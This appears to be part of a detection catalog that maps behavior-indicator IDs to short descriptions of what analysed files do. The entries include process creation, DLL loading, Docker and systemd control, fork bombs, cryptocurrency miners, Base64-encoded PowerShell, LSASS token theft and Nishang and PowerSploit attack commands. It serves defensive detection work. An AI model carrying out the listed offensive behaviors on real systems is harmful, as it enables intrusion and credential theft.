| BH12113 | Accesses memory in unusual way. | |
| BH12167 | Changes the priority of a process. | |
| BH12186 | Contains compiled Lua script bytecode. | |
| BH12187 | Calls a procedure in a dynamic link library or code resource at a specific memory address, commonly used to execute Windows APIs. | |
| BH12197 | Creates a fork bomb. | |
| BH12199 | Creates a new process which executes a shell. | |
| BH12203 | Creates a service. | |
| BH12204 | Creates a service using WMI. | |
| BH12207 | Creates and interacts with additional .NET objects. | |
| BH12208 | Creates and interacts with additional COM objects. | |
| BH12214 | Creates a process. | |
| BH12215 | Creates a new process using WMI. | |
| BH12220 | Delays execution. | |
| BH12317 | Elevates current user privileges. | |
| BH12320 | Evaluates an expression. | |
| BH12321 | Evaluates code dynamically. | |
| BH12322 | Evaluates PHP code dynamically. | |
| BH12324 | Executes a file and pauses script execution until the execution is finished. | |
| BH12325 | Executes a file with a hidden window. | |
| BH12328 | Executes an expression. | |
| BH12329 | Executes another application. | |
| BH12330 | Executes another batch file. | |
| BH12332 | Executes code using cmstp. | |
| BH12333 | Executes code within a trusted execution enclave. | |
| BH12334 | Executes commands as another user. | |
| BH12336 | Executes commands in a new PowerShell module. | |
| BH12337 | Executes commands in another application. | |
| BH12338 | Executes commands in command line. | |
| BH12339 | Executes commands inside Windows Store app container. | |
| BH12340 | Executes commands on a local or remote computer. | |
| BH12341 | Executes commands through DDE. | |
| BH12342 | Executes commands using superuser rights. | |
| BH12343 | Executes DiskPart scripts. | |
| BH12344 | Executes Operation Validation Framework tests for a PowerShell module. | |
| BH12345 | Executes Pester tests for Windows PowerShell. | |
| BH12347 | Executes scripts stored in an Alternate Data Stream (ADS). | |
| BH12348 | Executes scripts using cscript tool. | |
| BH12349 | Executes scripts using Shared Worker API. | |
| BH12352 | Executes Troubleshooting Packs. | |
| BH12353 | Executes additional DLL modules, or calls exported functions. | |
| BH12368 | Imports credentials management APIs from the Windows API. | |
| BH12372 | Imports process creation APIs from the Windows API. | |
| BH12373 | Imports registry management APIs from the Windows API. | |
| BH12385 | Installs an assembly. | |
| BH12391 | Installs system drivers. | |
| BH12392 | Interacts with Microsoft .NET Framework code, types and assemblies. | |
| BH12393 | Invokes commands obfuscated by format string permutations. | |
| BH12395 | Kills processes. | |
| BH12397 | Launches an application. | |
| BH12406 | Loads additional libraries. | |
| BH12459 | Opens a dynamic data exchange (DDE) channel to an external application. | |
| BH12463 | Controls a service. | |
| BH12480 | Removes a service using WMI. | |
| BH12481 | Removes a service. | |
| BH12482 | Removes a system driver using WMI. | |
| BH12499 | Requests information from an external application through dynamic data exchange (DDE). | |
| BH12542 | Runs a macro at a specified time. | |
| BH12543 | Runs a macro on a window switch. | |
| BH12544 | Runs a macro when a particular key or key combination is pressed. | |
| BH12545 | Runs a macro when a sheet is activated from another sheet. | |
| BH12546 | Runs a macro when a sheet is updated. | |
| BH12547 | Runs a macro when a specific cell, an object or an item is double-clicked. | |
| BH12548 | Runs a macro when data is entered into a cell. | |
| BH12549 | Runs a macro when external application sends data via dynamic data exchange (DDE). | |
| BH12550 | Runs an external program and pauses script execution until the program is finished. | |
| BH12551 | Runs an external program under the context of a different user and pauses script execution until the program is finished. | |
| BH12552 | Runs an external program under the context of a different user. | |
| BH12554 | Schedules a task on a remote computer. | |
| BH12556 | Sends keystrokes to an external application using dynamic data exchange (DDE). | |
| BH12557 | Sends keystrokes to an external application. | |
| BH12564 | Sets the command-line command that will run when the job finishes transferring data or when a job enters a state. | |
| BH12566 | Shuts down or reboots the system. | |
| BH12567 | Shuts down or restarts local or remote computers. | |
| BH12568 | Shutdowns or reboots a system. | |
| BH12569 | Shuts down or restarts the specified Remote Desktop Session Host server. | |
| BH12571 | Starts a PowerShell session and executes Base64-encoded commands. | |
| BH12572 | Starts a PowerShell session and executes specified commands from a file. | |
| BH12573 | Starts a PowerShell session and executes specified commands. | |
| BH12576 | Starts a PowerShell session. | |
| BH12579 | Starts Command Prompt. | |
| BH12580 | Starts new PowerShell Workflow Session. | |
| BH12581 | Starts Registry Editor. | |
| BH12582 | Starts Remote Desktop Connection. | |
| BH12583 | Starts Task Scheduler. | |
| BH12584 | Enables a scheduled task. | |
| BH12585 | Starts the remote control of another Remote Desktop Services session. | |
| BH12588 | Stops running processes. | |
| BH12595 | Tampers with App Background Tasks. | |
| BH12634 | Tampers with driver signing. | |
| BH12639 | Tampers with executable file startup parameters. | |
| BH12640 | Tampers with execution environment. | |
| BH12678 | Tampers with module search locations. | |
| BH12692 | Tampers with network print jobs. | |
| BH12744 | Tampers with system shutdown. | |
| BH12776 | Tampers with Windows PowerShell Desired State Configuration (DSC). | |
| BH12791 | Terminates a process on a specified Remote Desktop Session Host server. | |
| BH12792 | Terminates a process using WMI. | |
| BH12793 | Terminates a process. | |
| BH12794 | Terminates a process/thread. | |
| BH12795 | Terminates a service using WMI. | |
| BH12796 | Terminates browser processes. | |
| BH12801 | Uses a Lua script interpreter. | |
| BH12802 | Uses a Perl script interpreter. | |
| BH12803 | Uses a Python script interpreter. | |
| BH12804 | Uses a Ruby script interpreter. | |
| BH12812 | Uses Dynamic Data Exchange (DDE) to communicate with an external application. | |
| BH12815 | Uses the V8 JavaScript script interpreter (or some related framework). | |
| BH12817 | Uses Windows Management Instrumentation to access system. | |
| BH12818 | Uses Windows Management Instrumentation to create a process. | |
| BH12824 | Starts a service. | |
| BH12828 | Loads the advapi32.dll dynamic link library. | |
| BH12829 | Loads the bcrypt.dll dynamic link library. | |
| BH12830 | Loads the dbghelp.dll dynamic link library. | |
| BH12831 | Loads the kernel32.dll dynamic link library. | |
| BH12832 | Loads the msvcrt.dll dynamic link library. | |
| BH12833 | Loads the ntdll.dll dynamic link library. | |
| BH12834 | Loads the ole32.dll dynamic link library. | |
| BH12835 | Loads the oleaut32.dll dynamic link library. | |
| BH12836 | Loads the shell32.dll dynamic link library. | |
| BH12837 | Loads the urlmon.dll dynamic link library. | |
| BH12838 | Contains reference to advapi32.dll which is Advanced Windows 32 Base API. | |
| BH12839 | Contains reference to advapi32res.dll which is Advanced Windows 32 Base API. | |
| BH12840 | Contains reference to bcrypt.dll which is Windows Cryptographic Primitives Library (Wow64). | |
| BH12841 | Contains reference to dbghelp.dll which is Windows Image Helper. | |
| BH12842 | Contains reference to kernel32.dll which is Windows NT BASE API Client DLL. | |
| BH12843 | Contains reference to msvcrt.dll which is Windows NT CRT DLL. | |
| BH12844 | Contains reference to ntdll.dll which is NT Layer DLL. | |
| BH12845 | Contains reference to ole32.dll which is Microsoft OLE for Windows. | |
| BH12846 | Contains reference to shell32.dll which is Windows Shell Common Dll. | |
| BH12847 | Contains reference to urlmon.dll which is OLE32 Extensions for Win32. | |
| BH12876 | Starts a systemd service. | |
| BH12877 | Stops a systemd service. | |
| BH12883 | Preloads a library using LD_PRELOAD. | |
| BH12905 | Makes changes to the GUID partition table. | |
| BH12906 | Makes changes to the disk partition table. | |
| BH12907 | Creates a filesystem. | |
| BH12915 | Sends a dbus message. | |
| BH12918 | Calls an sd-bus method. | |
| BH12919 | Emits an sd-bus signal. | |
| BH12923 | Creates an initial ramdisk enviroment. | |
| BH12930 | Inserts a kernel module. | |
| BH12931 | Sends a kill signal to a systemd unit. | |
| BH12932 | Isolates a systemd unit. | |
| BH12933 | Freezes a systemd unit. | |
| BH12934 | Edits a systemd unit. | |
| BH12935 | Re-enables a systemd unit. | |
| BH12936 | Restarts a systemd unit. | |
| BH12937 | Reloads a systemd unit. | |
| BH12938 | Reloads the systemd manager configuration. | |
| BH12939 | Re-executes the systemd manager. | |
| BH12946 | Spawns a systemd container. | |
| BH12947 | Executes a program in a new namespace. | |
| BH12948 | Executes a program in a different namespace. | |
| BH12949 | Changes the reported architecture in a new program environment, or sets personality flags. | |
| BH12954 | Executes a process inside a network namespace. | |
| BH12957 | Traces system calls and signals. | |
| BH12958 | Traces library calls. | |
| BH12959 | Controls the kernel's audit system. | |
| BH12962 | Attaches to a running Docker container. | |
| BH12963 | Builds a Docker image from a Dockerfile. | |
| BH12964 | Generates a new Docker image from a container's changes. | |
| BH12966 | Creates a new Docker container. | |
| BH12968 | Runs a command in a running Docker container. | |
| BH12969 | Streams the contents of a Docker container as a tar archive. | |
| BH12970 | Creates a new filesystem image from the contents of a Docker tarball. | |
| BH12971 | Kills a running Docker container. | |
| BH12972 | Loads an image from a Docker tar archive. | |
| BH12973 | Restarts a Docker container. | |
| BH12974 | Removes one or more Docker containers. | |
| BH12975 | Removes one or more Docker images. | |
| BH12976 | Runs a command in a new Docker container. | |
| BH12977 | Starts a Docker container. | |
| BH12978 | Stops a Docker container. | |
| BH13010 | Adds a path to the DLL search path. | |
| BH13025 | Starts an OpenRC service. | |
| BH13026 | Stops an OpenRC service. | |
| BH13027 | Restarts an OpenRC service. | |
| BH13028 | Runs an OpenRC service command. | |
| BH13031 | Starts a runit service. | |
| BH13032 | Stops a runit service. | |
| BH13033 | Sends a signal to a runit service. | |
| BH13034 | Restarts a runit service. | |
| BH13039 | Executes a command as a different group ID. | |
| BH13047 | Executes a process inside a namespace sandbox. | |
| BH13049 | Executes an ACPI call using the /proc/acpi/call pseudo-file. | |
| BH13070 | Creates a Linux container. | |
| BH13071 | Attaches to a Linux Container. | |
| BH13072 | Destroys a Linux Container. | |
| BH13073 | Executes a command in a Linux Container. | |
| BH13074 | Stops a Linux Container. | |
| BH13075 | Freezes a Linux Container. | |
| BH13077 | Starts, stops or kills auto-started Linux Containers. | |
| BH13078 | Manages LXD instance and server configuration options. | |
| BH13079 | Deletes LXD instances and snapshots. | |
| BH13080 | Executes commands in LXD instances. | |
| BH13081 | Manages files in LXD instances. | |
| BH13082 | Manages LXD images. | |
| BH13083 | Creates and starts LXD instances from images. | |
| BH13086 | Lists, shows or deletes background LXD operations. | |
| BH13089 | Restarts LXD instances. | |
| BH13090 | Starts an LXD instance. | |
| BH13091 | Stops an LXD instance. | |
| BH13093 | Runs a command or interactive shell with special root directory. | |
| BH13095 | Starts an Ethereum cryptocurrency miner. | |
| BH13096 | Starts a Monero cryptocurrency miner. | |
| BH13097 | Links an object file. | |
| BH13098 | Compiles a C program. | |
| BH13099 | Compiles a C++ program. | |
| BH13100 | Compiles an Assembly program. | |
| BH13101 | Builds a Go package. | |
| BH13102 | Runs a Go package. | |
| BH13103 | Gets a Go package. | |
| BH13104 | Compiles a Rust package. | |
| BH13105 | Compiles a Java package. | |
| BH13106 | Compiles a Haskell package. | |
| BH13107 | Compiles a Maven package. | |
| BH13108 | Compiles a Gradle package. | |
| BH13109 | Runs a Gradle package. | |
| BH13126 | Uses the java.lang.reflect.Method.invoke method, which is used to call methods using reflection. | |
| BH13127 | Uses the java.lang.reflect.Constructor.newInstance method, which is used to construct new objects using reflection. | |
| BH13130 | Loads an interpreter for dynamic code evaluation. | |
| BH13131 | Loads an interpreter for dynamic code evaluation using reflection. | |
| BH13132 | Uses a JavaScript script interpreter. | |
| BH13133 | Uses a PHP script interpreter. | |
| BH13134 | Evaluates code dynamically using reflection. | |
| BH13135 | Evaluates JavaScript code dynamically. | |
| BH13136 | Evaluates Python code dynamically. | |
| BH13137 | Evaluates Ruby code dynamically. | |
| BH13138 | Terminates a process using reflection. | |
| BH13139 | Creates a process using reflection. | |
| BH13140 | Terminates the currently running Java Virtual Machine. | |
| BH13141 | Terminates the currently running Java Virtual Machine using reflection. | |
| BH13142 | Loads additional libraries using reflection. | |
| BH13143 | Terminates a thread using reflection. | |
| BH13145 | Calls a JavaScript method. | |
| BH13146 | Calls a JavaScript method using reflection. | |
| BH13147 | Evaluates JavaScript code dynamically using reflection. | |
| BH13148 | Executes Excel4 macros from VBA macros. | |
| BH13159 | Terminates all threads in a thread group. | |
| BH13165 | Creates a new Node.js process. | |
| BH13166 | Registers a new bus on the system. | |
| BH13167 | Unregisters a bus from the system. | |
| BH13168 | Adds a device to system device hierarchy. | |
| BH13169 | Removes a device from system device hierarchy. | |
| BH13170 | Creates a new device and registers it on the system. | |
| BH13171 | Registers a device on the system. | |
| BH13172 | Unregisters a device from the system. | |
| BH13175 | Attaches a device to a driver. | |
| BH13176 | Attaches a driver to a device. | |
| BH13177 | Registers a device driver on the system. | |
| BH13178 | Unregisters a device driver from the system. | |
| BH13181 | Adds a platform device to system device hierarchy. | |
| BH13182 | Removes a platform device from system device hierarchy. | |
| BH13183 | Creates a new platform device. | |
| BH13184 | Registers a platform device on the system. | |
| BH13185 | Unregisters a platform device from the system. | |
| BH13186 | Registers a platform device driver on the system. | |
| BH13187 | Unregisters a platform device driver from the system. | |
| BH13188 | Registers a root device on the system. | |
| BH13189 | Unregisters a root device from the system. | |
| BH13190 | Registers a subsystem at /sys/devices/system/. | |
| BH13191 | Registers a subsystem at /sys/devices/virtual/. | |
| BH13192 | Manages a set of tracked git repositories. | |
| BH13193 | Manages git repository branches. | |
| BH13195 | Uses Linux kernel APIs for PCI device management. | |
| BH13196 | Uses Linux kernel APIs for block device management. | |
| BH13197 | Uses Linux kernel APIs for character device management. | |
| BH13198 | Uses Linux kernel APIs for miscellaneous device management. | |
| BH13199 | Uses Linux kernel APIs for sound device management. | |
| BH13200 | Uses Linux kernel APIs for video device management. | |
| BH13201 | Uses Linux kernel APIs for digital TV (DVB) device management. | |
| BH13202 | Uses Linux kernel APIs for remote controller device management. | |
| BH13203 | Uses Linux kernel APIs for media controller device management. | |
| BH13204 | Uses Linux kernel APIs for fusion message device management. | |
| BH13205 | Uses Linux kernel APIs for intelligent input/output (I2O) device management. | |
| BH13206 | Uses Linux kernel APIs for parallel port device management. | |
| BH13207 | Uses Linux kernel APIs for inter-integrated circuit (I2C) device management. | |
| BH13208 | Uses Linux kernel APIs for input device management. | |
| BH13209 | Uses Linux kernel APIs for management of voltage and current regulators. | |
| BH13210 | Uses Linux kernel APIs for industrial input/output device management. | |
| BH13211 | Uses Linux kernel APIs for FireWire (IEEE 1394) device management. | |
| BH13212 | Uses Linux kernel APIs for general purpose input/output device management. | |
| BH13213 | Uses Linux kernel APIs for frame buffer device management. | |
| BH13214 | Uses Linux kernel APIs for serial peripheral interface (SPI) device management. | |
| BH13215 | Uses Linux kernel APIs for improved inter-integrated circuit (I3C) device management. | |
| BH13216 | Uses Linux kernel APIs for small computer system interface (SCSI) device management. | |
| BH13217 | Uses Linux kernel APIs for USB device management. | |
| BH13218 | Uses Linux kernel APIs for USB Type-C device management. | |
| BH13246 | Runs precompiled JavaScript code within V8 Virtual Machine context. | |
| BH13252 | Creates pipes for interprocess communication. | |
| BH13254 | Invokes system calls. | |
| BH13255 | Terminates the current running process. | |
| BH13256 | Loads code from a JavaScript source file. | |
| BH13257 | Installs and loads JavaScript module from the npm repository. | |
| BH13258 | Translates JavaScript code to Python code. | |
| BH13261 | Loads a WScript.Shell object that can be used to run programs in a new process. | |
| BH13274 | Creates a new process which executes a curl command. | |
| BH13275 | Creates a new process which executes a wget command. | |
| BH13283 | Creates a system thread that executes in kernel mode. | |
| BH13289 | Translates an address from a dynamically loaded shared library to its symbol name. | |
| BH13291 | Executes a Java application. | |
| BH13303 | Creates a new process which executes a whoami command. | |
| BH13304 | Creates a new process which executes a hostname command. | |
| BH13305 | Creates a new process which executes a nslookup command. | |
| BH15155 | Decrypts a file. | |
| BH15159 | Contains ROL encrypted PE file. | |
| BH15160 | Contains single-byte ADD encrypted PE file. | |
| BH15161 | Contains single-byte key-decrement ADD encrypted PE file. | |
| BH15162 | Contains single-byte key-decrement XOR encrypted PE file. | |
| BH15163 | Contains single-byte key-increment ADD encrypted PE file. | |
| BH15164 | Contains single-byte key-increment XOR encrypted PE file. | |
| BH15165 | Contains single-byte XOR encrypted PE file. | |
| BH15166 | Contains crush compressed PE file. | |
| BH15167 | Contains embedded PE file written in reverse. | |
| BH15168 | Contains fastlz compressed PE file. | |
| BH15170 | Contains Base32-encoded PE file. | |
| BH15171 | Contains Base64-encoded PE file. | |
| BH15172 | Contains lzf compressed PE file. | |
| BH15173 | Contains lzjb compressed PE file. | |
| BH15174 | Contains lzmat compressed PE file. | |
| BH15175 | Contains lzo2a compressed PE file. | |
| BH15176 | Contains slz compressed PE file. | |
| BH15177 | Contains ucl compressed PE file. | |
| BH15178 | Contains yappy compressed PE file. | |
| BH15181 | Contains brieflz compressed PE file. | |
| BH15234 | Decrypts data using the Windows Data Protection API. | |
| BH16159 | Downloads or installs modules from remote repositories. | |
| BH16176 | Sends data to an external application through dynamic data exchange (DDE). | |
| BH18243 | Sets SELinux enforcement policy. | |
| BH19463 | Prints or controls the kernel ring buffer. | |
| BH19464 | Queries the systemd journal. | |
| BH20107 | Uses a Nishang command to check for credentials on remote computers and open a PowerShell session if the credentials work. | |
| BH20122 | Uses a Nishang command to download an executable in text format, convert it to executable and execute. | |
| BH20123 | Uses a Nishang command to download and execute a PowerShell script. | |
| BH20124 | Uses a Nishang command to drop and execute executables on multiple computers. | |
| BH20128 | Uses a Nishang command to duplicate the access token of lsass.exe and set it in the current process thread. | |
| BH20129 | Uses a Nishang command to encode a string to a Base64 string. | |
| BH20132 | Uses a Nishang command to execute a script at a given time. | |
| BH20133 | Uses a Nishang command to execute commands and scripts from specially crafted Wireless Network Names. | |
| BH20134 | Uses a Nishang command to execute commands remotely on a MS SQL server. | |
| BH20135 | Uses a Nishang command to execute shellcode from DNS TXT queries. | |
| BH20138 | Uses a Nishang command to extract LSA Secrets from local computer. | |
| BH20168 | Uses PowerSploit/Empire command to build an immediate scheduled task to run through a specified Group Policy Object. | |
| BH20175 | Uses PowerSploit/Empire command to convert a security identifier (SID) to a group/user name. | |
| BH20208 | Uses PowerSploit/Empire command to execute a PowerShell ScriptBlock on a target computer and return its formatted output using WMI as a C2 channel. | |
| BH20210 | Uses PowerSploit/Empire command to execute commands on a remote server using MSBuild. | |
| BH20211 | Uses PowerSploit/Empire command to execute commands on a remote server using PsExec. | |
| BH20212 | Uses PowerSploit/Empire command to execute commands over SSH. | |
| BH20320 | Uses PowerSploit/Empire commands via various DCOM methods. | |
